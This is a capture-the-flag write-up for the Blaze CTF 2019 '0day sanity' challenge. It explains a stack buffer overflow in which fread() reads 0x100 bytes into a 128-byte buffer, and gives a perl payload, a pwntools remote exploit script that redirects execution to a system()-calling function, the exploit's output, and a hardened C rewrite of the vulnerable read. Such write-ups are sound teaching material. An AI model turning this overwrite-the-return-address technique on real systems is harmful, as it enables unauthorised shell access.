Blaze CTF 2019 - 0day sanity
After connecting to the server, it asks for base64-encoded data.
So I sent "Bz==" to observe the behavior. The result is as follows.
****************
root@kali:~# nc chal.420blaze.in 42004
Give me a file (base64 encoded, followed by a newline):
Bz==
b'\x07'
thanks, time to pwn
your very own home: /tmp/tmppeijv007
analyzing your file.............
�sm0ke
time's up!
root@kali:~#
****************
[Vulnerability identification]
The binary file "chal" is also provided.
Decompiling "chal" with Ghidra, I found the vuln() function.
vuln() does the following:
(1) Opens the file specified on the command line of "chal".
-> fopen() is used.
(2) Reads 0x100 bytes from the file into a buffer.
-> fread() is used.
(3) Prints the data from (2) with printf().
At (2), the buffer is only 128 bytes long.
That is shorter than the 0x100 bytes read, so there is a stack buffer overflow (BoF).
I sent a long base64-encoded string to the server.
-> As I expected, a segmentation fault happened.
From the 145th byte of input onward, the return address of vuln() is overwritten.
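To make the bug concrete from the defender's side, here is an added example (not the challenge's source, which is only known from the decompilation described above): the fread()-into-a-smaller-buffer pattern is reconstructed in a comment, and beside it a hardened reader that ties the read length to the buffer size, NUL-terminates, and prints through "%s". The buffer size, file path and helper names are my assumptions for the demo.

```c
#include <stdio.h>
#include <string.h>

/* The pattern the writeup describes in vuln(), reconstructed from the
 * prose (assumption, not the challenge's actual source):
 *
 *     char buf[128];
 *     FILE *f = fopen(path, "rb");
 *     fread(buf, 1, 0x100, f);   // 256 bytes into a 128-byte buffer
 *     printf(buf);               // also a format-string sink
 *
 * The read length is a constant that does not match the buffer, so any
 * file longer than 128 bytes runs past the buffer into the saved frame
 * pointer and return address. */

#define BUF_SIZE 128   /* assumed buffer size, matching the writeup */

/* Hardened reader: the read length is derived from the buffer size,
 * the buffer is always NUL-terminated, and callers print it via "%s".
 * Returns the number of bytes read, or -1 if the file cannot be opened. */
long read_file_safely(const char *path, char *buf, size_t buf_size)
{
    FILE *f = fopen(path, "rb");
    if (f == NULL)
        return -1;
    size_t n = fread(buf, 1, buf_size - 1, f);   /* leave room for NUL */
    fclose(f);
    buf[n] = '\0';
    return (long)n;
}

/* Demo helper: write `len` bytes of 'A' to a constructed temporary file,
 * mimicking an oversized input file. Returns 0 on success. */
int write_sample_file(const char *path, size_t len)
{
    FILE *f = fopen(path, "wb");
    if (f == NULL)
        return -1;
    for (size_t i = 0; i < len; i++)
        fputc('A', f);
    fclose(f);
    return 0;
}

/* Demo: a 300-byte file against a 128-byte buffer yields 127 bytes read
 * plus a NUL terminator, and never a write past the buffer. */
long demo(void)
{
    const char *path = "/tmp/chal_demo_input.txt";   /* constructed sample */
    char buf[BUF_SIZE];
    if (write_sample_file(path, 300) != 0)
        return -1;
    long n = read_file_safely(path, buf, sizeof(buf));
    printf("read %ld bytes: %s\n", n, buf);   /* "%s", never printf(buf) */
    remove(path);
    return n;
}

int main(void)
{
    return demo() == BUF_SIZE - 1 ? 0 : 1;
}
```

The key change is that the bound passed to fread() is sizeof(buf) - 1 rather than a separate constant, so the two cannot drift apart; the explicit NUL terminator also keeps the later print from reading past the data.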
[Exploit]
I found the dont_mind_me() function at 0x8048506 in "chal".
It calls the system() function.
In the local environment, I can get a shell with the following procedure.
************************
root@kali:~/CTF# perl -e 'print "A"x144 . "\x06\x85\x04\x08" . "\n"' > flag3.txt
root@kali:~/CTF# ./chal flag3.txt
#
************************
The script for the remote environment is as follows.
Note: The location of flag.txt is given in the challenge notification -> /home/pwn/flag.txt
************************
# coding:utf-8
from pwn import *
host = "chal.420blaze.in"
port = 42004
r = remote(host, port)
message = r.recvuntil(b"followed by a newline):")
r.recvline()
r.recvline()
print(message)
code = b"A" * 144 # dummy padding up to the saved return address of vuln()
code += p32(0x8048506) # address of dont_mind_me(), which calls system()
#code += b"\n"
print(code)
print(b64e(code))
r.sendline(b64e(code)) # the server expects the file content base64-encoded
r.sendline(b"\n")
r.sendline(b"cat /home/pwn/flag.txt\n") # read by the shell that system() spawns
r.interactive()
********************************
The result is...
********************************
root@kali:~# python solve_Blaze.py
[+] Opening connection to chal.420blaze.in on port 42004: Done
Give me a file (base64 encoded, followed by a newline):
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x06\x85\x0
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBBoUECA==
[*] Switching to interactive mode
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x06\x85\x04\x08'
thanks, time to pwn
your very own home: /tmp/tmpr_pjqy7v
analyzing your file.............
blaze{gratz_on_teh_l33t_smoked_0day}
============= NICE HIT =============
[*] Got EOF while reading in interactive
$
**************************************
Flag is: blaze{gratz_on_teh_l33t_smoked_0day}